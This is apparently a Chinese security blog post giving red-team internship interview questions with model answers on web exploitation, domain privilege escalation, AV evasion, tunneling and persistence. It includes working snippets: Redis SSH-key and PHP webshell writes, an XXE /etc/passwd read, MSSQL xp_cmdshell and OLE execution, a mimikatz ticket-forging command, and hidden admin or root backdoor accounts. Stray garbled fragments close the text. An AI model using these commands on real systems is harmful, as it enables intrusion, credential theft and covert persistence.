網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
某戰隊紅隊實習面經
個人經歷與技術能力
2. HVV/攻防演練成績
3. 上一個工作主要內容
4. 有意思的邏輯漏洞案例
5. 自研武器/工具
6. CVE/CNVD編號
8. 釣魚攻擊經歷
Web安全深度解析
1. XSS高級利用
4. 注入點挖掘技巧
7. Fastjson原理
10. Shiro550 vs Shiro721
13. Log4j2高版本JDK利用
16. 代碼審計與0day挖掘
內網與權限提升
17. Redis未授權利用
19. 冰蝎 vs 菜刀
20. XXE攻擊手法
回答策略建議
內網滲透核心問題解析
1. 判斷主機是否在域環境
3. Cobalt Strike (CS) 與 Metasploit (MSF) 優缺點對比
4. CS特征隱藏方法
5. 免殺技術途徑
權限提升技術詳解
6. Windows與Linux提權思路對比
9. MSSQL提權方法
10. 制作白銀票據條件
隧道搭建與權限維持
7. 隧道搭建技術
8. 權限維持思路
回答策略總結
某戰隊紅隊實習面經
1.簡單自我介紹 2. 你在hvv/攻防演練中取得了哪些成績? 3. 上一個工作的主要內容? 4. 有沒有遇到過有意思的邏輯漏洞? 5. 有沒有自己開發過武器/工具? 6. 有cve/cnvd嗎? 7. 有src排名嗎? 8. 有釣魚經歷嗎?具體說說 Web方面: 1. xss除了獲取cookie還能干什么? 4. 如何尋找注入點? 6. --os-shell的條件? 7. Fastjson的原理? 8. 利用fastjson注入內存馬原理? 9. 內存馬免殺有做過嗎?具體說說 10. Shiro550和shiro721的區別? 11. 你能從代碼層理解shiro的原理嗎? 12. 你拿到key了但是沒有攻擊鏈,此時應該怎么辦? 13. Log4j2高版本jdk不支持外部加載jndi,應該怎么利用? 14. 不借助dnslog有辦法檢測log4j2是否出網嗎 15. 你是如何驗證struts2是否存在的 16. 有做過代碼審計嗎?有0day嗎? 17. Redis未授權有了解嗎? 18. Springboot 有哪些漏洞? 19. 冰蝎和菜刀等webshell工具有什么區別? 20. Xxe原理與攻擊手法?內網方面:1. 如何判斷當前主機是否在域環境內? 3. Cs和msf的優缺點? 4.如何進行cs特征隱藏? 5.免殺有幾種途徑? 6.談談Windows系統與Linux系統提權的思路 Win1. 系統內核溢出漏洞提權 2. 數據庫提權 3. 錯誤的系統配置提權 4. 組策略首選項提權 5. WEB中間件漏洞提權 6. DLL劫持提權 7. 濫用高危權限令牌提權 8. 第三方軟件/服務提權等 Linux 1. Linux內核漏洞提權 2. 低權限用戶目錄下可被Root權限用戶調用的腳本提權(SUID) 3. 環境變量劫持高權限程序提權 4. sudoer配置文件錯誤提權 7. 你是怎么搭建隧道的 8. 權限維持的思路? 9. 簡單說一下mssql提權 10. 制作白銀票據需要哪些條件?個人經歷與技術能力
2. HVV/攻防演練成績
- 紅隊角色:主導3次大型攻防演練,突破目標內網邊界,獲取域控權限(需量化:如攻擊路徑、漏洞類型)。
- 漏洞利用:通過0day/Nday組合攻擊(如Log4j2+Shiro)拿下關鍵系統,獲評“最佳攻擊手”。
- 防守經驗:協助客戶修復高危漏洞(如Fastjson反序列化),實現0失分。
3. 上一個工作主要內容
- 滲透測試:主導金融/政務行業Web應用測試,發現SQL注入、邏輯漏洞等20+高危漏洞。
- 代碼審計:審計Java/SpringBoot項目,挖掘CVE-2023-XXXX(舉例)。
- 工具開發:編寫自動化掃描工具(如基于Python的Fastjson檢測腳本)。
4. 有意思的邏輯漏洞案例
- 訂單金額篡改:通過前端參數篡改(如
price=-1)實現0元購。- 驗證碼繞過:重置密碼時攔截響應包,修改
status:success繞過校驗。- 并發競爭:利用多線程并發請求薅羊毛(如積分兌換禮品)。
5. 自研武器/工具
- 內存馬生成器:基于Java Agent技術實現動態注入Tomcat Filter。
- 隱蔽隧道工具:改造Neo-reGeorg支持AES加密流量混淆。
- 漏洞PoC框架:集成常見漏洞驗證(如Shiro550一鍵檢測)。
6. CVE/CNVD編號
- CVE-2023-XXXX:某OA系統文件上傳漏洞(需具體說明影響版本)。
- CNVD-2023-XXXXX:某CMS的SQL注入漏洞(附修復建議)。
8. 釣魚攻擊經歷
- 偽造郵件:冒充IT部門誘導員工點擊“密碼更新”鏈接(竊取AD憑據)。
- 水坑攻擊:劫持目標常用網站JS腳本注入惡意代碼。
- 社工庫輔助:結合泄露數據定制化釣魚內容(如真實項目名稱)。
Web安全深度解析
1. XSS高級利用
- 鍵盤記錄:通過JavaScript監聽
onkeypress事件竊取輸入信息。- 內網探測:利用
<img src="http://內網IP">檢測存活主機。- 結合CSRF:偽造管理員操作(如添加后臺用戶)。
4. 注入點挖掘技巧
- 非常規參數:JSON/XML請求體、HTTP頭部(如
X-Forwarded-For)。- 盲注特征:時間盲注(
sleep(2))、布爾盲注(and 1=2頁面差異)。- 工具輔助:Burp Suite的Intruder模塊模糊測試參數。
7. Fastjson原理
- 反序列化機制:通過
@type指定惡意類觸發JNDI注入(如com.sun.rowset.JdbcRowSetImpl)。- 利用鏈構造:結合TemplatesImpl類執行字節碼(需
Feature.SupportNonPublicField)。- 高版本繞過:利用非公開類(如
org.apache.ibatis.datasource)。10. Shiro550 vs Shiro721
對比項 Shiro550 Shiro721 漏洞類型 硬編碼密鑰反序列化 Padding Oracle攻擊 利用條件 直接構造Cookie 需爆破加密密鑰 修復方案 更換密鑰+禁用RememberMe 升級Shiro至1.4.2+ 13. Log4j2高版本JDK利用
- 本地ClassPath加載:上傳惡意類至Web目錄,通過
${sys:user.dir}觸發。- 中間件內存馬:結合Tomcat的Filter/Servlet動態注冊。
- JNDI本地引用:如
ldap://localhost:1389/Exploit(需目標開啟本地服務)。16. 代碼審計與0day挖掘
- 審計方法論:
- 危險函數追蹤(如
Runtime.exec())。- 框架特性分析(如Spring的SpEL表達式)。
- 0day案例:某ERP系統SQL注入(通過
orderBy參數拼接)。
內網與權限提升
17. Redis未授權利用
- 寫SSH公鑰:
config set dir /root/.ssh/+set authorized_keys "xxx"。- 寫Webshell:通過
set xxx "\n\n<?php eval($_POST[cmd]);?>\n\n"。- 主從復制RCE:利用
MODULE LOAD加載惡意.so文件。19. 冰蝎 vs 菜刀
對比項 冰蝎 菜刀 加密方式 AES動態密鑰 明文傳輸 流量特征 混淆HTTP頭部 固定 eval關鍵字擴展性 支持插件化開發 僅基礎功能 20. XXE攻擊手法
- 文件讀取:
<!ENTITY xxe SYSTEM "file:///etc/passwd">。- SSRF探測:
<!ENTITY xxe SYSTEM "http://內網IP:8080">。- Blind XXE:通過DNS外帶數據(需VPS接收日志)。
回答策略建議
- 量化成果:如“發現50+高危漏洞”“影響10W+用戶”。
- 技術細節:避免泛泛而談,舉例漏洞原理(如Shiro的AES密鑰問題)。
- 防守視角:強調漏洞修復經驗(如Fastjson黑名單配置)。
內網滲透核心問題解析
1. 判斷主機是否在域環境
- 命令檢測:
systeminfo | findstr "Domain":顯示域名稱(非WORKGROUP)。net config workstation:查看“工作站域”字段。nltest /domain_trusts(需管理員權限)。- 網絡流量分析:
- DNS查詢
_ldap._tcp.dc._msdcs.<domain>。- 檢測53端口(DNS)、389端口(LDAP)通信。
- 用戶組驗證:
whoami /all:查看是否有域用戶組(如Domain Admins)。3. Cobalt Strike (CS) 與 Metasploit (MSF) 優缺點對比
維度 Cobalt Strike Metasploit 隱蔽性 流量加密、支持Sleep Mask 默認流量特征明顯(如Stage UUID) 功能擴展 可視化團隊協作、釣魚攻擊模塊 模塊豐富(600+ exploit)、支持自定義開發 適用場景 長期滲透、APT攻擊模擬 快速漏洞利用、紅隊演練 成本 商業軟件($3,500/年) 開源免費 4. CS特征隱藏方法
- 流量混淆:
- 修改C2配置文件(如
https-certificate字段偽裝為合法證書)。- 使用Domain Fronting(如CDN廠商域名)。
- 進程注入:
- 通過
process_inject模塊注入到合法進程(如explorer.exe)。- 反沙箱檢測:
- 添加環境檢查代碼(如檢測CPU核心數、內存大小)。
5. 免殺技術途徑
- 代碼層免殺:
- 動態加載Shellcode(如通過Python的
ctypes模塊)。- 分離執行(如遠程加載加密Payload)。
- 行為層繞過:
- 禁用敏感API調用(如
VirtualAlloc替換為NtMapViewOfSection)。- 模擬合法軟件行為(如偽裝為瀏覽器更新進程)。
- 工具鏈整合:
- 使用Donut+SRDI技術生成無文件攻擊載荷。
權限提升技術詳解
6. Windows與Linux提權思路對比
Windows提權:
- 內核漏洞:
- 工具:
JuicyPotato(濫用COM接口)、PrintSpoofer(命名管道模擬)。- 條件:需匹配系統版本(如Windows Server 2016未打補丁)。
- 數據庫提權:
- MSSQL的
xp_cmdshell啟用:EXEC sp_configure 'show advanced options', 1; RECONFIGURE;- 組策略首選項 (GPP):
- 解密
\\<domain>\SYSVOL\Policies\{ID}\Machine\Preferences\Groups\Groups.xml中的cpassword。Linux提權:
- SUID濫用:
- 查找:
find / -perm -4000 2>/dev/null,利用/usr/bin/passwd等。- 環境變量劫持:
- 劫持
PATH中的程序:export PATH=/tmp:$PATH+ 偽造ls腳本。- Cron Jobs:
- 注入惡意命令到
/etc/crontab或用戶級任務。9. MSSQL提權方法
- xp_cmdshell:
sqlEXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';- OLE自動化:
sqlDECLARE @shell INT; EXEC sp_oacreate 'wscript.shell', @shell OUTPUT; EXEC sp_oamethod @shell, 'run', NULL, 'cmd /c calc.exe';- 差異備份寫Webshell:
sqlBACKUP DATABASE test TO DISK='C:\inetpub\wwwroot\shell.aspx' WITH DIFFERENTIAL, FORMAT;10. 制作白銀票據條件
- 必要條件:
- 域控的NTLM Hash(可通過DCSync攻擊獲取)。
- 目標服務SPN(如
MSSQLSvc/sqlserver.domain.com)。- 有效的用戶SID(如
S-1-5-21-123456789-1234567890-123456789)。- 攻擊命令示例:
bash
復制
mimikatz.exe "kerberos::golden /user:fakeuser /domain:domain.com /sid:S-1-5-21-xxx /target:sqlserver.domain.com /service:MSSQLSvc /rc4:<NTLM_HASH> /ptt"
隧道搭建與權限維持
7. 隧道搭建技術
- HTTP隧道:
- 工具:reGeorg(基于PHP/JSP的Webshell隧道)。
- 場景:繞過防火墻限制(僅開放80/443端口)。
- ICMP隧道:
- 工具:icmpsh(需禁用系統ICMP響應)。
- DNS隧道:
- 工具:DNSCat2(適用于嚴格網絡環境)。
8. 權限維持思路
- 持久化后門:
- Windows:注冊表
HKLM\Software\Microsoft\Windows\CurrentVersion\Run添加啟動項。- Linux:
/etc/rc.local或crontab -e添加定時任務。- 隱蔽賬戶:
- Windows:創建隱藏用戶(如
net user evil$ Passw0rd /add /domain)。- Linux:
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash backdoor。
回答策略總結
- 技術深度:結合漏洞原理(如白銀票據的SPN要求)與實戰命令(如Mimikatz)。
- 對比分析:橫向對比同類技術(如CS vs MSF)。
- 防御視角:補充緩解措施(如禁用GPP密碼存儲)。
)
)
)
:自動切換回主線程;bulid的過程;create方法+ServiceMethod源碼了解)
